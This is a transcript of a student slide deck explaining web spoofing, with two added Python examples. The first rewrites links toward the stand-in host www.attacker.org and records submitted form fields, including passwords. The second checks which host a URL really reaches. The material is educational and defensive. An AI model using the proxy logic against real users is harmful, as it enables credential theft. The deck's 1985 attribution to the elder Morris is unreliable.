II Web Spoofing

Date post: 10-Apr-2018
Upload: yukti-chuttani
Transcript

Page 1: II Web Spoofing

8/8/2019 II Web Spoofing

http://slidepdf.com/reader/full/ii-web-spoofing 1/16

WEB SPOOFING

Prepared by:
YUKTI CHUTTANI
B.C.A III
15008000610

Page 2: II Web Spoofing

Web Spoofing

Allows an attacker to create a "shadow copy" of the entire World Wide Web.

The attacker creates a misleading context in order to trick the victim. The attack is like a con game.

Online fraud.

Page 3: II Web Spoofing

History

The concept of spoofing was discussed in the 1980s. In 1985 Robert Morris described a security weakness in the TCP protocol, now known as sequence number prediction, that lets an attacker forge packets which appear to come from a trusted host (his son, Robert Tappan Morris, later wrote the 1988 Internet worm).

Page 4: II Web Spoofing

[no text on this slide]

Page 5: II Web Spoofing

Spoofing attacks in the physical world as well as the electronic world

In the physical world, for example, there have been several incidents in which criminals set up bogus automated teller machines. The criminals copy the victim's card and use the duplicate.

In these attacks people were fooled by the context of what they saw: the location of the machine and the appearance of its electronic display.

People using computer systems often make security-relevant decisions based on contextual cues they see. For example, you might decide to type in your account number because you believe you are visiting your bank's web page. This belief might arise because the page has a familiar look.

Page 6: II Web Spoofing

Consequences

Surveillance: the attacker can passively watch the traffic, recording which pages the victim visits and the contents of those pages. (This allows the attacker to observe any account numbers or passwords the victim enters.)

Tampering: the attacker can modify any of the data traveling in either direction between the victim and the Web. (For example, the attacker could change the product number, quantity or ship-to address of an order.)

Page 7: II Web Spoofing

How the Attack Works

Forms

URL Rewriting

Page 8: II Web Spoofing

URL Rewriting

The attacker's first trick is to rewrite all of the URLs on some web page so that they point to the attacker's server rather than the real server. Assuming the attacker's server is on the machine www.attacker.org, the attacker rewrites a URL by adding http://www.attacker.org/ to the front of the URL. For example, http://home.netscape.com becomes http://www.attacker.org/http://home.netscape.com.

Once the attacker's server has fetched the real document needed to satisfy the request, the attacker rewrites all of the URLs in the document into the same special form. Then the attacker's server provides the rewritten page to the victim's browser.

If the victim follows a link on the new page, the …

Page 9: II Web Spoofing

Forms

When the victim submits a form, the submitted data goes to the attacker's server. The attacker's server can observe and even modify the submitted data, doing whatever malicious editing is desired, before passing it on to the real server.
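The rewriting described on the two slides above, as an added example that is not part of the original slides: rewrite_url() and rewrite_html() turn the real page's links into the http://www.attacker.org/<real URL> form, unwrap() recovers the real URL from a request that comes back to the attacker's server, and forward_form() shows where a form submission passes through that server. The host names www.attacker.org and home.netscape.com are the slides' own examples; REAL_PAGE and the form fields are constructed for the demo, and nothing here touches the network.

```python
"""Added example (not from the slides): the URL-rewriting step of a
web-spoofing proxy, and what the attacker's server does with a request
and a form submission that come back through it.

The attacker host www.attacker.org and the target http://home.netscape.com
are the slides' own example names. REAL_PAGE is a constructed sample of
what the real server might return; there is no network access here.
"""
import re
from urllib.parse import urljoin, urlsplit

ATTACKER = "http://www.attacker.org"

# Attributes whose values the browser follows, fetches, or submits to.
ATTR_RE = re.compile(r'\b(href|src|action)\s*=\s*"([^"]*)"', re.IGNORECASE)


def rewrite_url(url: str, base: str) -> str:
    """Point one URL at the attacker's server: attacker + "/" + real URL.

    Relative links are resolved against the real page's base URL first, so
    the rewritten form always carries the full real address and the proxy
    can recover it later with unwrap().
    """
    return f"{ATTACKER}/{urljoin(base, url)}"


def rewrite_html(html: str, base: str) -> str:
    """Rewrite every href/src/action in a fetched page into the spoofed form.

    Afterwards links, images and form submissions all go to the attacker's
    server while the page still looks like the real one.
    """
    return ATTR_RE.sub(
        lambda m: f'{m.group(1)}="{rewrite_url(m.group(2), base)}"', html
    )


def unwrap(request_path: str) -> str:
    """Recover the real URL from the path the victim's browser requested.

    A browser following http://www.attacker.org/http://home.netscape.com/login
    sends the path "/http://home.netscape.com/login"; the proxy strips the
    leading "/" and fetches that from the real server.
    """
    real = request_path.lstrip("/")
    if urlsplit(real).scheme not in ("http", "https"):
        raise ValueError(f"not a rewritten URL: {request_path!r}")
    return real


def forward_form(request_path: str, fields: dict, captured: list) -> tuple:
    """Handle a form submission that arrived at the attacker's server.

    The real destination is recovered with unwrap(); the submitted fields are
    recorded (surveillance) and could be edited here before being passed on
    (tampering). Returns the real URL and the fields the real server would
    receive; it does not itself send anything.
    """
    real_url = unwrap(request_path)
    captured.append((real_url, dict(fields)))  # the attacker's copy
    return real_url, dict(fields)


# Constructed sample of the real page: a relative link, an absolute image
# URL, and a form that posts to a different (HTTPS) host.
REAL_PAGE = (
    '<a href="/login">Sign in</a>\n'
    '<img src="http://home.netscape.com/logo.gif">\n'
    '<form action="https://secure.netscape.com/submit" method="post">'
)

if __name__ == "__main__":
    print(rewrite_html(REAL_PAGE, "http://home.netscape.com/"))
    log = []
    print(forward_form("/https://secure.netscape.com/submit",
                       {"user": "victim", "pass": "hunter2"}, log))
    print("captured:", log)
```

Note that the form's HTTPS action is rewritten to a plain http:// URL on the attacker's host, so the victim's browser never negotiates TLS with the real server; this is why the slide on protecting yourself says to look for a secure connection, and why the lock has to belong to the site in the location line rather than to any site at all.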

Page 10: II Web Spoofing

How the attacker attacks the victim

Page 11: II Web Spoofing

Destroying the Illusion

There are cues that can destroy the illusion:

Status line

Location line

Viewing document source

These can be virtually eliminated.

Page 12: II Web Spoofing

Remedies to be followed

Follow a three-part strategy:

Disable JavaScript in your browser so the attacker will be unable to hide the evidence of the attack;

Make sure your browser's location line is always visible;

Pay attention to the URLs displayed on your browser's location line, making sure they always point to the server you think you are connected to. The server is the host name immediately after the scheme: in http://www.attacker.org/http://home.netscape.com the browser is talking to www.attacker.org, and the bank's name is only part of the path.
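An added example (not from the slides) of the location-line check in the third remedy: connected_host() reports the host the browser will actually talk to, and check_location() compares it with the host you expect and explains the mismatch. The host names home.netscape.com and www.attacker.org are the slides' examples; the URLs in SAMPLES are constructed for the demo.

```python
"""Added example (not from the slides): checking the browser's location
line the way the remedy above asks. It reports the host the browser will
actually connect to, which for a rewritten URL is the attacker's machine
even though the real site's name is visible later in the URL.

home.netscape.com and www.attacker.org are the slides' example hosts; the
URLs in SAMPLES are constructed for the demo.
"""
from urllib.parse import urlsplit


def connected_host(url: str) -> str:
    """Host the browser will connect to for this URL ("" if there is none).

    urlsplit() takes only the authority (between "//" and the next "/") as
    the host; anything host-like later in the URL is path text and is never
    contacted. .hostname also drops a port and any "user@" prefix, so
    http://home.netscape.com@www.attacker.org/ is reported as
    www.attacker.org, and it lower-cases the result. A bare
    "home.netscape.com/login" with no scheme has no host at all.
    """
    return urlsplit(url).hostname or ""


def check_location(url: str, expected_host: str) -> tuple:
    """Return (ok, reason) for whether url really points at expected_host."""
    host = connected_host(url)
    if host == expected_host.lower():
        return True, f"ok: connected to {host}"
    reason = f"connected to {host or 'no host'}, not {expected_host}"
    if expected_host.lower() in url.lower():
        reason += " (the expected name appears only as path or user text)"
    return False, reason


# Constructed location-line values: the real site, the rewritten URL from
# the slides, a userinfo disguise, and the real site with odd casing/port.
SAMPLES = [
    "http://home.netscape.com/login",
    "http://www.attacker.org/http://home.netscape.com/login",
    "http://home.netscape.com@www.attacker.org/login",
    "HTTPS://Home.Netscape.com:443/login",
]

if __name__ == "__main__":
    for u in SAMPLES:
        ok, why = check_location(u, "home.netscape.com")
        print("PASS" if ok else "FAIL", u, "->", why)
```

The point of the check is that the only part of a URL that decides which server receives the request is the authority; the victim's eye is drawn to the familiar name, so the comparison has to be made on the parsed host, not on whether the name appears anywhere in the string.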

Page 13: II Web Spoofing

Protecting yourself against e-mail or online fraud

Don't take anything for granted.

Do not click on links you receive in an e-mail message asking for sensitive personal, financial or account information.

Call the company directly to confirm requests for updating or verifying personal or account information.

Do not share your IDs or pass codes with anyone.

Look for secure connections on Web sites.

Always sign off Web sites or secure areas of Web sites.

When your computer is not in use, shut it down or disconnect it from the Internet.

Page 14: II Web Spoofing

Completing the illusion:

The attack as described thus far is fairly effective, but not perfect. There is still some remaining context that can give the victim clues that the attack is going on. Such evidence is not too hard to eliminate, because browsers are very customizable. The ability of a web page to control browser behavior is often desirable, but when the page is hostile it can be dangerous.

Page 15: II Web Spoofing

Conclusion:

Spoofing is a serious threat to the international community, as real-world applications are increasingly moving onto the WWW. By understanding the tools and methods the spoofers have at their disposal, we can defend against these attacks to a considerable extent.

Page 16: II Web Spoofing

THANKS

